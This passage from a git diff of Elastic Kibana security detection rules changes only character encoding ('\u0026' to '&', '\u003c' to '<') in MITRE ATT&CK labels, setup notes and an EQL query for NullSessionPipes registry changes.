 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json
index 079a825884b..2c101ac3084 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_5.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json
index b89bf9ef216..ea7f3ae56ef 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_104.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json
index e139735469c..51e54870d50 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_105.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json
index c22d53c8f76..b0700225ddc 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_106.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json
index 25d1e25ef6f..2baf7cb8b42 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_107.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json
index f0dd42be96e..09db33be226 100644
--- a/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/dc9c1f74-dac3-48e3-b47f-eb79db358f57_108.json
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "dc9c1f74-dac3-48e3-b47f-eb79db358f57",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json
index 32bc5b5ddb1..0440fbe91fb 100644
--- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_2.json
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json index f2cda7d6e33..6bcb9cd0002 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json index fae05faedf3..fd42822b678 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_4.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json index 07ba3f79d42..bc33c12ebab 100644 --- a/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json +++ b/packages/security_detection_engine/kibana/security_rule/dd34b062-b9e3-4a6b-8c0c-6c8ca6dd450e_5.json 
@@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json index 6875e5de65c..7b3bbb2499d 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_103.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json index 599fecb25ba..d103fe61e94 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json index 1e89de8c677..f464ddf44da 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json index a08659d7ac4..4f06722b016 100644 --- a/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ddab1f5f-7089-44f5-9fda-de5b11322e77_106.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "NullSessionPipe Registry Modification", - "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) \u003e 0\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\nregistry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\services\\\\LanmanServer\\\\Parameters\\\\NullSessionPipes\"\n) and length(registry.data.strings) > 0\n", "references": [ "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares" @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json index 117584de0dd..cd715c62777 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_104.json @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json index 02db8026916..22a1437d20e 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_105.json 
@@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json index a1a6405542a..f073f68957b 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_106.json 
@@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json index e81b6fd628e..276805cbf71 100644 --- a/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json +++ b/packages/security_detection_engine/kibana/security_rule/de9bd7e0-49e9-4e92-a64d-53ade2e66af1_107.json 
@@ -49,7 +49,7 @@ ], "risk_score": 73, "rule_id": "de9bd7e0-49e9-4e92-a64d-53ade2e66af1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json index 771082f613f..58300f726ec 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json index ce7bbdf13c7..249474e07a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json index 76f5a401eb3..f119663e037 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_105.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json index 4ee296a2191..14ac4f50a06 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_106.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json index 399c48d425c..32a6b6fbf7d 100644 --- a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json +++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_107.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json index 5bfb83cd23f..f9176cdadda 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json index 02ed414e2cf..88e31fb8cf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json index e7b70dfc2f8..8b2a67d2ec1 100644 --- a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json index c3e7376b74c..18d5b01d72a 100644 --- a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_2.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_3.json index 56f1d5683bc..37786bfdf7c 100644 --- 